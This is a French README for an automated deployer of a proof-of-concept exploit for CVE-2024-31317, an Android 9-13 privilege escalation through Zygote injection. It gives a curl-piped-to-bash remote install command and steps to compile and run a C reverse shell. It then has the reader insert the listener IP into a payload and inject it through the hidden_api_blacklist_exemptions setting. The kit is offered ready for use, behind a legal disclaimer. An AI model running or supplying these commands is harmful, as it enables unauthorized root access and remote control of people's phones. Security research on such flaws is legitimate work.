
Outil de déploiement automatisé pour le PoC CVE-2024-31317 sur Android 9-13, permettant l'élévation de privilèges via l'injection Zygote et l'exécution d'un reverse shell.
Un outil de déploiement pour la preuve de concept de l'exploitation de CVE-2024-31317 ciblant les appareils Android 9 à 13.
CVE-2024-31317-PoC-Deployer est un script de déploiement automatisé permettant de générer et configurer rapidement tous les fichiers nécessaires à l'exploitation de la vulnérabilité CVE-2024-31317. Cette vulnérabilité affecte les appareils Android 9 à 13 et permet une élévation de privilèges via le processus Zygote ainsi que l'exécution de code arbitraire.
reverse_shell.c - Programme de shell inverse implémenté en Cpayload.txt - Charge utile d'exploitation spécialement conçuecompile.sh - Script de compilation automatiqueREADME.txt - Instructions d'utilisation détailléesCVE-2024-31317.txt - Document d'analyse technique de la vulnérabilitéExécuter le script de déploiement à distance :
pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
Compiler le shell inverse :
sh compile.sh
Lancer l'écouteur du shell inverse :
sh reverse_shell
payload.txt sur l'appareil cible dans /data/local/tmp/xxx.xxx.xxx dans payload.txt par l'adresse IP de votre serveur d'écouteam force-stop com.android.settings
cd /data/local/tmp/
settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
am start -n com.android.settings/.Settings
settings put global hidden_api_blacklist_exemptions "null"
Cet outil est destiné uniquement à des fins de tests de sécurité légitimes et de recherche. Une autorisation explicite du système cible est requise avant toute utilisation. Toute utilisation non autorisée peut enfreindre la loi. Le développeur décline toute responsabilité en cas d'usage abusif.
Ce projet est sous licence MIT – voir le fichier LICENSE pour plus de détails.